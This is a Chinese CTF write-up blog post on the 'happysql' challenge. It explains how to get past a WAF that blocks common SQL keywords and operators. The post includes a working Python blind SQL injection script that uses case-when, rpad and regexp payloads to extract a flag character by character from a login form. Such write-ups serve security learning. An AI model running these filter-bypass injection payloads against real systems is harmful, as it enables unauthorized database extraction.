hmgctf学习sql注入新姿势

happysql

挺恶心的,刚开始fuzz了一下,感觉禁了一些比较平常的东西,都可以找到对应姿势过waf,但越做越不对劲。

%title插图%num

禁了and,or,&&这些,用了||替代,然后就是一些截取函数例如substr,想着就用left去替代了,然后用ascii(left())去取,发现了=,<,>,like,rlike都给禁了,网上说是能用in,就尝试了一下,没测出个什么东西来,挺郁闷的,之后发现lpad、regexp和benchmark,发现有个比较麻烦的问题就是禁用了if。后来看了学长的脚本,用的是case when then else end,这个就类似于if else

select case when(满足条件)then(语句1)else(语句2) end语句
import requests
import string,re
def str_to_hex(s):
    return ' '.join([hex(ord(c)).replace('0x', '') for c in s])

def hex_to_str(s):
    return ''.join([chr(i) for i in [int(b, 16) for b in s.split(' ')]])

url = "http://eci-2zej5nwlszgd868060ye.cloudeci1.ichunqiu.com/login.php"

flag = ""
t=""
for i in range(25,80):
    print(i)
    for j in re.escape(''',0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"{#%&()-./:;<=>?@[\\]^_`|}~'''):
        # payload = "database()" #ctf

        # payload="select group_concat(table_name) from mysql.innodb_table_stats where database_name regexp database()" #ctf,f1ag
        payload='select b from (select 1 as b union select * from f1ag)as a'
        payload='select group_concat(a.1) from (select 1 union select * from f1ag) as a'
        data={
            'username':('wa123123"||case when (rpad(({}),{},1))regexp(0x{}) then 1 else 0 end#'.format(payload,i,flag+hex(ord(j)).replace('0x',''))).replace(' ','/**/'),
            'password':'123'
        }
        # print(data)
        res = requests.post(url=url, data=data)
        if "<meta http-equiv=" in res.text:
            flag+=hex(ord(j)).replace('0x','')
            t+=j
            print(flag,t)
            break
        elif 'injection' in res.text:
            print('wrong')
            exit()
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇